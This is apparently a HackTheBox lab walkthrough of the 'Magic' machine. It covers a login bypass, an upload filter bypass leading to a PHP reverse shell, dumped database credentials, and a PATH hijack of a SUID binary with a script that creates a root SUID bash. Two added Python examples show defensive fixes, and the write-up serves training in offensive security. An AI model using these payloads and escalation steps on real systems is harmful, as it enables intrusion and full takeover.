#hackthebox #linux #medium
![[Pasted image 20250817133158.png]]
# Information Gathering - Nmap
I started the box by scanning all TCP ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 16:31 UTC
Nmap scan report for 10.10.10.185
Host is up (0.058s latency).
Not shown: 64994 closed tcp ports (reset), 539 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 16.89 seconds
```
Then I ran a second scan with service and script detection against the two open ports, 22 and 80.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 16:33 UTC
Nmap scan report for 10.10.10.185
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.13 seconds
```
Lastly, I performed a UDP scan against the top 10 ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 16:34 UTC
Nmap scan report for 10.10.10.185
Host is up (0.046s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
123/udp closed ntp
135/udp open|filtered msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
161/udp closed snmp
445/udp closed microsoft-ds
631/udp open|filtered ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds
```
---
# Enumeration
##### HTTP - TCP 80
The landing page of port 80 looks like this:
![[Pasted image 20250817113904.png]]
`/login.php` has a login form. I attempted a few default credentials but none of them worked.
![[Pasted image 20250817114036.png]]
I ran `gobuster` but didn't find anything useful.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.185
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://10.10.10.185/images/]
/assets (Status: 301) [Size: 313] [--> http://10.10.10.185/assets/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
```
One thing that caught my attention was the text above this image. At first I thought the whole thing was a single image, but it is actually text rendered on top of an image.
![[Pasted image 20250817115145.png]]
The source code reads like this: `<div align="center"><h1>m̴̛̫̼̟͔̼̗̼͈̒̐ȧ̷̹͍̝̬͈̦͊́̿̊̿̈́g̷̲͚̖̣̪͙͎̏͂̿̇̇ͅi̴̺̻̝͍̦͎͇̞͖̅͋́c̴̢͙͇̙̣̟̿̒̑͂͐̔͂</h1><br></div>`
Back to `/login.php`, I intercepted the login request and tried a few simple SQLi payloads. One of them changed the server's behaviour: it returned `302 Found`.
![[Pasted image 20250817115709.png]]
Following the redirect led me to `/upload.php`.
![[Pasted image 20250817115753.png]]
# Initial Access - Shell as `www-data`
![[Pasted image 20250817115953.png]]
I uploaded a random image file from my Desktop and the page confirmed that the file had been uploaded.
![[Pasted image 20250817120036.png]]
I sent exactly the same request with only the file extension changed to `.php`, and this time the server returned `Sorry, only JPG, JPEG & PNG files are allowed.`
![[Pasted image 20250817120223.png]]
However, I was able to bypass this filter just by appending `.png` after `.php`.
![[Pasted image 20250817120352.png]]
I replaced the PNG file data with a simple PHP one-liner and the server still accepted it. Next I checked whether the uploaded file could be used for command execution.
![[Pasted image 20250817120531.png]]
I passed `id` as the parameter and the page displayed the output of the `id` command, which confirms that the unrestricted file upload leads to command execution.
![[Pasted image 20250817120755.png]]
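The extension check that `wook.php.png` slips past, modelled next to a hardened version. This is an added example for illustration, not the box's `upload.php`; the function names, the allowlist and the sample bytes in the test are constructed here.

```python
import secrets
from typing import Optional

# Extensions the server advertises as acceptable, mapped to a content type.
ALLOWED = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}
# Magic bytes for those content types.
SIGNATURES = {"png": b"\x89PNG\r\n\x1a\n", "jpeg": b"\xff\xd8\xff"}


def weak_check(filename: str) -> bool:
    """Models the broken validation: only the text after the LAST dot is
    inspected, so 'wook.php.png' passes as a PNG. If the web server is also
    configured to hand anything containing '.php' to the PHP engine, the
    uploaded file runs as code."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED


def hardened_check(filename: str, data: bytes) -> Optional[str]:
    """Returns the server-chosen storage name, or None if the upload is rejected.

    Three independent controls: exactly one extension (no 'a.php.png'), that
    extension must be allowlisted, and the content must start with the magic
    bytes of the type the extension claims. The stored name is random and its
    extension is chosen by the server from the detected type, never copied from
    the client. Magic bytes alone do not stop a polyglot (valid PNG header
    followed by PHP), so the upload directory must additionally have script
    execution disabled; that control lives in the web server configuration.
    """
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return None  # 'wook.php.png' splits into 3 parts -> rejected
    kind = ALLOWED.get(parts[1])
    if kind is None:
        return None  # '.php', '.phtml', ... never allowed
    if not data.startswith(SIGNATURES[kind]):
        return None  # content does not match the claimed type
    return f"{secrets.token_hex(16)}.{'png' if kind == 'png' else 'jpg'}"
```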
Then I replaced the PHP one-liner with Pentest Monkey's php-reverse-shell and named the file `wook.php.png`.
![[Pasted image 20250817121844.png]]
Navigating to `http://10.10.10.185/images/uploads/wook.php.png` triggered the payload on the server and I got a reverse shell as `www-data`.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.185] 60248
Linux magic 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
10:18:05 up 49 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
# Privilege Escalation - Shell as `theseus`
`ss` shows port 3306 listening on `127.0.0.1` only, which suggests a `MySQL` service is running locally.
```bash
www-data@magic:/opt$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:39442 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:631 0.0.0.0:*
udp UNCONN 0 0 [::]:54061 [::]:*
udp UNCONN 0 0 [::]:5353 [::]:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:631 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 5 [::1]:631 [::]:*
```
`/etc/passwd` also shows that a `mysql` user exists.
```bash
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false
```
In the `/var/www/Magic` directory, the file `db.php5` stood out to me.
```bash
www-data@magic:/var/www/Magic$ ls -l
total 40
drwxrwxr-x 6 www-data www-data 4096 Jul 6 2021 assets
-rw-r--r-- 1 www-data www-data 881 Oct 16 2019 db.php5
drwxr-xr-x 4 www-data www-data 4096 Jul 6 2021 images
-rw-rw-r-- 1 www-data www-data 4528 Oct 22 2019 index.php
-rw-r--r-- 1 www-data www-data 5539 Oct 22 2019 login.php
-rw-r--r-- 1 www-data www-data 72 Oct 18 2019 logout.php
-rw-r--r-- 1 www-data www-data 4520 Oct 22 2019 upload.php
```
As expected, it contained a set of database credentials:
`theseus:iamkingtheseus`
```bash
www-data@magic:/var/www/Magic$ cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}
```
I tried to connect to the MySQL server, but the `mysql` client does not appear to be installed on the target box.
```bash
www-data@magic:/home$ mysql -h localhost -u theseus -p
Command 'mysql' not found, but can be installed with:
apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1
Ask your administrator to install one of them.
```
Tab-completing `mysql` showed a number of other MySQL tools that are installed and that I could possibly use.
```bash
www-data@magic:/var/www/Magic$ mysql
mysql_config_editor mysqld
mysql_embedded mysqld_multi
mysql_install_db mysqld_safe
mysql_plugin mysqldump
mysql_secure_installation mysqldumpslow
mysql_ssl_rsa_setup mysqlimport
mysql_tzinfo_to_sql mysqloptimize
mysql_upgrade mysqlpump
mysqladmin mysqlrepair
mysqlanalyze mysqlreport
mysqlbinlog mysqlshow
mysqlcheck mysqlslap
```
I dumped all of the databases, and this part of the dump shows the credentials I was interested in:
`admin:Th3s3usW4sK1ng`
```bash
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2025-08-17 10:45:23
```
I successfully switched to `theseus` with the credentials found in the dump.
```bash
www-data@magic:/var/www/Magic$ su theseus
Password:
theseus@magic:/var/www/Magic$ id; whoami
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus
```
# Privilege Escalation - shell as `root`
Found `user.txt` in `/home/theseus`
```bash
theseus@magic:~$ ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
theseus@magic:~$ cat user.txt
24d...
```
Next I searched for binaries with the SUID bit set.
```bash
theseus@magic:/var/www/Magic$ find / -type f -perm -4000 2>/dev/null | grep -v snap
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping
```
`/bin/sysinfo` stood out to me. I confirmed that it has the SUID bit set, is owned by root, and is executable by the `users` group, which `theseus` belongs to.
```bash
theseus@magic:/var/www/Magic$ ls -l /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
theseus@magic:/var/www/Magic$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
```
I ran the `sysinfo` binary:
```bash
theseus@magic:/var/www/Magic$ sysinfo
====================Hardware Info====================
H/W path Device Class Description
====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7763 64-Core Processor
...
```
Running `sysinfo` under `ltrace` prints the library calls the binary makes. There are a lot of them, but one stood out: `popen("fdisk -l", "r")`. `popen` runs a command through `/bin/sh` and returns a pipe to its output. The binary invokes `fdisk` without an absolute path, so the shell resolves it through `PATH`; in a SUID-root binary this opens the door to a path hijacking attack.
![[Pasted image 20250817131650.png]]
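How a privileged program should have invoked its helper instead: absolute path, an allowlist, no shell, and a sanitized environment so the caller's `PATH` never reaches the child. This is an added defensive example, not code from the box; `SAFE_PATH`, `ALLOWED_COMMANDS` and the function names are assumptions made here, and `/bin/sh` is allowlisted only so the demo can print what the child actually sees.

```python
import os
import subprocess

# Fixed, trusted search path; a privileged program must never inherit PATH.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
# Hypothetical allowlist of helpers by absolute path. /bin/sh is included only
# so demo_poisoned_path() can show the environment the child receives.
ALLOWED_COMMANDS = {"/sbin/fdisk", "/usr/sbin/fdisk", "/bin/sh"}


def validate_argv(argv):
    """Return None if argv may be run from a privileged context, else the reason."""
    if not argv:
        return "empty command"
    prog = argv[0]
    if not os.path.isabs(prog):
        # This is the sysinfo mistake: a bare 'fdisk' is resolved via the caller's PATH.
        return f"relative command name {prog!r} would be resolved via the caller's PATH"
    if prog not in ALLOWED_COMMANDS:
        return f"{prog!r} is not an allowlisted helper"
    return None


def run_privileged(argv):
    """Run argv the way sysinfo should have run 'fdisk -l': absolute path, no
    shell (so no word splitting or PATH lookup), and a minimal environment so
    the caller's PATH and other variables never reach the child."""
    reason = validate_argv(argv)
    if reason is not None:
        raise ValueError(reason)
    env = {"PATH": SAFE_PATH, "LANG": "C"}
    proc = subprocess.run(argv, env=env, capture_output=True, text=True, check=False)
    return proc.stdout


def demo_poisoned_path():
    """Prepend a world-writable directory to this process's PATH, as the attack
    above does, and show that the child still sees only SAFE_PATH."""
    os.environ["PATH"] = "/tmp:" + os.environ.get("PATH", "")
    return run_privileged(["/bin/sh", "-c", "echo $PATH"]).strip()
```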
To perform the path hijacking attack, I first created a payload. When `sysinfo` runs `fdisk`, this script runs instead and makes a copy of `/bin/bash` owned by root with the SUID bit set. The file has to be named `fdisk`, or the lookup will never hit it.
```bash
theseus@magic:/tmp$ ls
fdisk
theseus@magic:/tmp$ cat fdisk
#!/bin/bash
cp /bin/bash /tmp/wook
chown root:root /tmp/wook
chmod 6777 /tmp/wook
```
Because I created the payload in `/tmp`, I prepended `/tmp` to the `PATH` environment variable so that it is searched first.
```bash
theseus@magic:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
theseus@magic:/tmp$ export PATH=/tmp:$PATH
theseus@magic:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
```
Run `sysinfo` to trigger the payload.
```bash
theseus@magic:/tmp$ sysinfo
====================Hardware Info====================
H/W path Device Class Description
====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7763 64-Core Processor
...
<SNIP>
```
Back in `/tmp`, my copy of bash had been created, owned by root with the SUID and SGID bits set.
```bash
theseus@magic:/tmp$ ls
fdisk wook
theseus@magic:/tmp$ ls -l wook
-rwsrwsrwx 1 root root 1113504 Aug 17 11:26 wook
```
I gained a shell as `root` by running the copy with `-p`, which tells bash to keep the effective UID instead of dropping it.
```bash
theseus@magic:/tmp$ ./wook -p
wook-4.4# whoami
root
```
Found `root.txt`
```bash
wook-4.4# cd /root
wook-4.4# ls
info.c root.txt snap
wook-4.4# cat root.txt
3d0...
```